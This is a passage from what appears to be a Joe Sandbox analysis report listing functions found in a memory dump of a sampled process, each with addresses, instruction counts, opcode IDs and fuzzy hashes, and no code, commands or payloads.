                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ae6dfc1218372c6ddee18c9d8fbd7c52694b1f28caa17c708e8c9325acee4f82
                                                                                                                                                          • Instruction ID: 22cdc7951d08f074f9bdc808914e6b81765f875d857a972cf7d72c4a8c1539fc
                                                                                                                                                          • Opcode Fuzzy Hash: ae6dfc1218372c6ddee18c9d8fbd7c52694b1f28caa17c708e8c9325acee4f82
                                                                                                                                                          • Instruction Fuzzy Hash: 20218D70E01248EFCF15CFA9E594AEEBFB6FF49208F148069E415EA290DB34D941DB60
                                                                                                                                                          Function 015962F0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: da9b76a3a2e08ac9984140647b4fe4ffaf606fd6150fbfd17802d04683bc678f
                                                                                                                                                          • Instruction ID: 69adb55e39b3fff4185340ad87d88ef35d6246fe33e367f0d3ef526958a55868
                                                                                                                                                          • Opcode Fuzzy Hash: da9b76a3a2e08ac9984140647b4fe4ffaf606fd6150fbfd17802d04683bc678f
                                                                                                                                                          • Instruction Fuzzy Hash: 701106357046118FDB258A2DD89892E7BA2FFC93513194479E906CF3A4CF30DC06CB91
                                                                                                                                                          Function 015927F0 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 70e5c17f9145da8c68bb645bc84b485d51f642a470a27373c1c1daffa83b9631
                                                                                                                                                          • Instruction ID: 301679e4415e268b6098cb48195e47ade8784b1f73e70b4a57d98bfaaa69c5bc
                                                                                                                                                          • Opcode Fuzzy Hash: 70e5c17f9145da8c68bb645bc84b485d51f642a470a27373c1c1daffa83b9631
                                                                                                                                                          • Instruction Fuzzy Hash: 7821E2B4C0120A8FCB40DFA9D9855EEBFF4FF0A310F10416AD919B6214E7355A89DFA1
                                                                                                                                                          Function 0159F320 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a1fec9b5be9ea094b20eb7a544da3455f10ec15b90cb6d806e1657ec90c89417
                                                                                                                                                          • Instruction ID: 8e5dc8969c924bf2ef6e080227b9eade83e00af9f1361d2cb41053f228821867
                                                                                                                                                          • Opcode Fuzzy Hash: a1fec9b5be9ea094b20eb7a544da3455f10ec15b90cb6d806e1657ec90c89417
                                                                                                                                                          • Instruction Fuzzy Hash: CC113AB0E0010ADFDB44DFACD98469EBFF1FB45300F1095AAD414AB254EB349A459B81
                                                                                                                                                          Function 01595E98 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ab9d714a14971a6f627cc933a97d01675c2fcc7b7a10068a2db601d11e624ea7
                                                                                                                                                          • Instruction ID: fe6a41740138aebf35c5e3846c030e9fcd612cbadfc1357de90f0bacc5438cc2
                                                                                                                                                          • Opcode Fuzzy Hash: ab9d714a14971a6f627cc933a97d01675c2fcc7b7a10068a2db601d11e624ea7
                                                                                                                                                          • Instruction Fuzzy Hash: 7D01F9336041555FCB52CE68D840AAE3BEBFBCA250B18805AF914CF294DEB68D159BA1
                                                                                                                                                          Function 0159E8E8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3407497c8b1e2bf4e071a116ee8eca057c4579876b2e2682cc700fdecb084683
                                                                                                                                                          • Instruction ID: 1936a9254e6127838b3207447d33ff86f0d4a9dcbc008a0e2a23ed062a32f1c2
                                                                                                                                                          • Opcode Fuzzy Hash: 3407497c8b1e2bf4e071a116ee8eca057c4579876b2e2682cc700fdecb084683
                                                                                                                                                          • Instruction Fuzzy Hash: 9C116974D0020AEFCB01CFA8E944AAEBBB1FB89300F11406AE910E3350D7395E55DFA0
                                                                                                                                                          Function 0159ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b76b16c266515e275d25dade19a05c29917a62f17e65526766fa8a5cc9641a9b
                                                                                                                                                          • Instruction ID: 889b6da553f5c607da4796ffd203003a298d535f7149b2da7a5b430c31f1f329
                                                                                                                                                          • Opcode Fuzzy Hash: b76b16c266515e275d25dade19a05c29917a62f17e65526766fa8a5cc9641a9b
                                                                                                                                                          • Instruction Fuzzy Hash: BAF096317006104B9B266A2ED854A2EBAEEFFC8A553554079FA09CF365EE61CC0287A1
                                                                                                                                                          Function 01599C29 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 14004ac3420f0a14057b4660552a7eb0380e67de8f8da48cf7d17fbf094eef9b
                                                                                                                                                          • Instruction ID: ffde2a92e08af34f599bc4df55a32e975b79515fdf2f7993e02db0363a1c5fa6
                                                                                                                                                          • Opcode Fuzzy Hash: 14004ac3420f0a14057b4660552a7eb0380e67de8f8da48cf7d17fbf094eef9b
                                                                                                                                                          • Instruction Fuzzy Hash: 88F05E32A001589FDF50DF69D844BEEBBF5EBC8325F11C06AE918C7214D73149158B91
                                                                                                                                                          Function 015928A2 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d79c668a4bdd91dd5b302978d70f1c74ec16950dd4a6fb4102719effd854e0bb
                                                                                                                                                          • Instruction ID: 9d0172fe633ff29cc61cc9b810bc65e1ec12a97276486fe1f9a0976497818594
                                                                                                                                                          • Opcode Fuzzy Hash: d79c668a4bdd91dd5b302978d70f1c74ec16950dd4a6fb4102719effd854e0bb
                                                                                                                                                          • Instruction Fuzzy Hash: 85E0D835D54317CBC701E7B09D000DDB734AD82221B18455BC42176151E7341659C7A1
                                                                                                                                                          Function 01596739 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b8b0047c75779d3b276af3a419a0202db4b0e33280775ea5287a12159fb63bd5
                                                                                                                                                          • Instruction ID: d7e36dbf0f5f7224383cde755a0419f9f7eafc147ce1451edc07a3a06aba9560
                                                                                                                                                          • Opcode Fuzzy Hash: b8b0047c75779d3b276af3a419a0202db4b0e33280775ea5287a12159fb63bd5
                                                                                                                                                          • Instruction Fuzzy Hash: ADE0CD328083818FC746D738F8C95493F76FF932147289AAED4458E156CFBD1859DB21
                                                                                                                                                          Function 015928B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 631968152f92a8a085456fff605429584fd68494db96d47bbbf5d0c975dffc1b
                                                                                                                                                          • Instruction ID: eef81e55a18710681684a9a98b29a2baeac054be9c35fad894fcd2d0b64e3e16
                                                                                                                                                          • Opcode Fuzzy Hash: 631968152f92a8a085456fff605429584fd68494db96d47bbbf5d0c975dffc1b
                                                                                                                                                          • Instruction Fuzzy Hash: 76D05B35D2022B97CB01E7A5EC044DFF738EED6261B544626D91437154FB702659C6F1
                                                                                                                                                          Function 01598EF8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                          • Instruction ID: d6d95e0cb489ab4f83c65f0fb31406148f6cea650563e3603dfeaae1d10c789c
                                                                                                                                                          • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                          • Instruction Fuzzy Hash: 32C0123320C1282AEB25104E7C40AA7AA8DE2C22B4A211137FA2C9B200A842AC8001AA
                                                                                                                                                          Function 0159AFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6a7b198e8c9eccc90cac8233ec546571885af91a956e21eb9589f76db5916f13
                                                                                                                                                          • Instruction ID: 6a0cf3a703487257afe98034a4b2dc603bd73fd45422a41823b9501879e23b74
                                                                                                                                                          • Opcode Fuzzy Hash: 6a7b198e8c9eccc90cac8233ec546571885af91a956e21eb9589f76db5916f13
                                                                                                                                                          • Instruction Fuzzy Hash: DED0673AB400189FCB149F98E8809DDF776FB98221B448116EA25A7265C6719925DB50
                                                                                                                                                          Function 01596748 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5bfab9410f819e52f9c9fc8e4f78cdcd2ce6232a6477224fc5ad3f0b63c6ab5c
                                                                                                                                                          • Instruction ID: 8f0bcadb3f138c9f4e30327fc1e3e5d882c2870f08e09ed7d48a074839d94d5f
                                                                                                                                                          • Opcode Fuzzy Hash: 5bfab9410f819e52f9c9fc8e4f78cdcd2ce6232a6477224fc5ad3f0b63c6ab5c
                                                                                                                                                          • Instruction Fuzzy Hash: 57C012319043198BC549E779FC89515376AF7D02007549A14E4050A589DFFC1C995791

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 01596920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \;fq$\;fq$\;fq$\;fq
                                                                                                                                                          • API String ID: 0-4080798596
                                                                                                                                                          • Opcode ID: f82aafa017eab2d6c8d1b6eb9bb0086f159ef4a32129b081aa065a038597afa2
                                                                                                                                                          • Instruction ID: 74a2b7fc0cdc6b26408e8070f99c99e308e7f30b8cf53d269a924d46a752abe2
                                                                                                                                                          • Opcode Fuzzy Hash: f82aafa017eab2d6c8d1b6eb9bb0086f159ef4a32129b081aa065a038597afa2
                                                                                                                                                          • Instruction Fuzzy Hash: D3018B31B101158FCF248E2DC580AAA77EABF88774725456AE509CF3B1DF31EC458792